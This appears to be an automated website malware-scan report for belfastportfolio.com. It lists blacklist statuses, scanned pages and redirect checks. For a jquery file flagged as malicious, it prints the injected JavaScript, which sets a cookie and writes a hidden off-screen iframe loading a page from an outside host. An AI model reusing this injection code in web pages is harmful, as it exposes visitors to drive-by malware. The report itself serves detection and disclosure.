Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=belfastportfolio.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://belfastportfolio.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://belfastportfolio.com/ | 200 OK Content-Length: 10109 Content-Type: text/html | clean |
http://belfastportfolio.com/jquery/jquery-1.2.6.min.js | 200 OK Content-Length: 5392 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (b_haystack, b_needle, b_offset) { var haystack = (b_haystack + '').toLowerCase(); var needle = (b_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, b_offset)) !== -1) { return index; } return false; } function uni_wievier(){ var gadSN = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant','Chromium','Firefox','Maxthon','BlackBerry','Mini'] return cocumber ? decodeURIComponent(cocumber[1]) : undefined; } if (!uni_wievier()) { var cookie = getCookie('mini_oper18a7_listu18s'); if (cookie == undefined) { setTimer('mini_oper18a7_listu18s', true, 260001); document.write('<iframe sr'+'c'+'="http://dondrtra.zhonghenglamp.com/jetruitrioeytitur13.html" st'+'yle="po'+'sit'+'ion:absolute;'+'left'+':'+'-1370px;'+'top'+':'+'-1370px;" height="130" width="130"></iframe>'); } } })(); Antivirus reports:
| ||
http://belfastportfolio.com/index.php | 200 OK Content-Length: 10109 Content-Type: text/html | clean |
http://belfastportfolio.com/about.php | 200 OK Content-Length: 8961 Content-Type: text/html | clean |
http://belfastportfolio.com/how.php | 200 OK Content-Length: 14290 Content-Type: text/html | clean |
http://belfastportfolio.com/events.php | 200 OK Content-Length: 4711 Content-Type: text/html | clean |
http://belfastportfolio.com/shop.php | 200 OK Content-Length: 5153 Content-Type: text/html | clean |
http://belfastportfolio.com/comments.php | 200 OK Content-Length: 6616 Content-Type: text/html | clean |
http://belfastportfolio.com/portfoliobyname.php | 200 OK Content-Length: 4876 Content-Type: text/html | clean |
http://belfastportfolio.com/jcromie | 200 OK Content-Length: 7551 Content-Type: text/html | clean |
http://belfastportfolio.com/cbs | 200 OK Content-Length: 7407 Content-Type: text/html | clean |
http://belfastportfolio.com/martinmcc | 200 OK Content-Length: 5096 Content-Type: text/html | clean |
http://belfastportfolio.com/gayle | 200 OK Content-Length: 6074 Content-Type: text/html | clean |
http://belfastportfolio.com/onlinedesign | 200 OK Content-Length: 5966 Content-Type: text/html | clean |
http://belfastportfolio.com/test404page.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: belfastportfolio.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 06 Oct 2014 22:46:23 GMT
Server: LiteSpeed
Content-Type: text/html
X-Powered-By: PHP/5.4.25
GET / HTTP/1.1
Host: belfastportfolio.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 06 Oct 2014 22:46:23 GMT
Server: LiteSpeed
Content-Type: text/html
X-Powered-By: PHP/5.4.25
Second query (visit from search engine):
GET / HTTP/1.1
Host: belfastportfolio.com
Referer: http://www.google.com/search?q=belfastportfolio.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: belfastportfolio.com
Referer: http://www.google.com/search?q=belfastportfolio.com
Result:
The result is similar to the first query. There are no suspicious redirects found.